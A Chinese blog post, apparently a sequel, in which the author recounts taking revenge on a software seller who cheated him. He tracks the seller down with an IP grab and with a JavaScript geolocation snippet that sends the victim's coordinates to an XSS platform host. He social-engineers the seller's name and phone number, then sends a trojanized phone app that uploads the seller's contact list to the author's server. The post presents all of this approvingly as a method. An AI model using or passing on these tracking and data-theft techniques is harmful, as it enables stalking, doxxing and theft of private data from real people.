(续集)来来真的来了,锤作者续集!

前言 0x01:

自从上次 发了一篇 分析沙雕童年 时 用的shua QB软件 ,我看见了有很多人跟我一样的经历 也有这么多人期待锤作者过程


线下 我就加了作者 ,运气还不错 作者还在用这个 QQ,


既然还在用,那就陪你玩玩嘛 以下 可能会涉及多方面知识点,请自备眼药水
--------------------------------------------------------------------------------------
正文 0x02:


开始本想着说 屌他一顿,但是年事已久,骂他有何卵子用 ???


人家直接拉黑我,不就完事了,不行  人犯错了 总得付出点代价 !


于是我 先线下 加了作者QQ 我先利用搜素 引擎 搜素了他的QQ  
1


发现这个b,混迹各种编程论坛,还为他人解答程序问题 (你tm,这么好 ,为啥还要干这种卵子事,骗我30块钱?)


然后就脑袋,就开始了想想 当初 混迹安全圈 学习的知识点  看到他经常混迹 各大论坛 心里有就有数了


开始我想着说 然后加上qq 就直接问他 可否 还写程序呢 ? 假装 求助写程序的 自己写个小马控他 但是 回答了我 :不写了 ,心灰意冷 !


然后脑袋回想 他有混迹于  网站建设 类型的论坛,于是 问他  可否仿站 ?回答了 我:是
2


于是 我开始拿出 我以前 玩的东西  开始构造 :先通过软件 抓他IP
3


但是发现 光有IP 也没有啥用啊 ,百度地图api接口都已经关闭,直接拿IP定位 压根就不准 !


然后对于一个皮的一批的 懂前端的我  这里就 利用网页获取 经纬度 误差在 50米-1公里 这里就不公布xss平台,了解的人 知道怎么找   于是我 开始搭建 xss 获取经纬度项目 :

[JavaScript] 纯文本查看 复制代码

function getLocation() //获取GPS定位方法
  {
  if (navigator.geolocation)
    {
    navigator.geolocation.getCurrentPosition(showPosition);
    }
  else{x.innerHTML="Geolocation is not supported by this browser.";}
  }
function showPosition(position)
  {
//alert("Latitude: " + position.coords.latitude + "Longitude: " + position.coords.longitude); //测试,注释掉
    (new Image()).src='https://0bug.cf/index.php?do=api&id={projectId}&weidu='+position.coords.latitude+'&jingdu='+position.coords.longitude; //向XSS平台发送经纬度信息
}
       
getLocation();

然后创建模块 ,设置俩参数
4

勾选调用 !
5


成功之后 会出来 给你短的链接 ,于是 我把这个短的链接 安插进我的网站 坐等 上钩!
6


然后我还用其他平台的在线短链接,进行转换 ,我让叫他 放进手机浏览器 打开 ,不知道真打开 还是假打开 我这么就看见后台 发来了定位
7


看到经度 ,维度 都 已经全部获取到了 ,在看之前我抓的IP 恩~  然后 我就通过经纬度 在线查 成功获取到了 他的位置!
8


这里 我不确定 ,这个b是不是家庭住址,还是说公司地址 ,反正大概位置 都定位到了 ,现在 光有定位 有什么用 ?叫什么 ?姓什么 ?你晓得?很明显不知道
然后开始没啥思路 就去支付宝搜索 他的qq+@qq.com 邮箱 发现这个b的 支付宝号都被人干封了 嘿嘿 有点小尴尬
9


没法咯,然后就说 要他给转账 但是 公司得对接财务 于是我成功忽悠到 他的手机号码 !

10


姓名 手机号码 都社工到了 ,如果涉及金额大的话   估计会GG,但是吧 其实到这里 可能有的人 拿到这么多信息够了吧 ?
对于优秀程序员的我来说 并不!


于是我又问起 是否写手机软件 !他回答我 是 !
11


呵呵呵 ,打开 e4a 写上一条代码 !(好像没有e4a格式 代码格式  额就手写把 .....)


在主窗口下写上 :客户1.连接服务器(“这是你的服务器地址” 666 5000)
12


然后 在 用易语言写个端口数据接收器
13


发送给他 ,很快 他手机里面的 通讯录 全部 获取成功 !
14


好了 基本 就对这个作者 信息   就这样,本开始说 利用穷举算法 对其爆破身份证号码 (别质疑 真的 可以穷举出身份证号码 ,然后调用的第三方官方作为验证接口 )但是好像 拿到没什么卵用 乱秀了一波多余的操作 !


本想着说d一下电脑IP  就得了 但是 想到 当初 俩个周都没零花钱,苦的日子,真的是 忍一时,越想越亏,退一步 ,越想越气!


后面的源码就不放了,给个思路就行 ,另外在劝 各位 在大数据的时代下 真心保护哈自己哈 ,或者说 做事之前 得对的起 自己良心。


如果不听,比我优秀的人,多的是 ,他们有各种方式收拾你  。。。。

看的爽的话,cb+热心点点 哦  

THE END
喜欢就支持以下吧
点赞0
分享
评论 抢沙发
  • 管埋员

    昵称

  • 取消
    昵称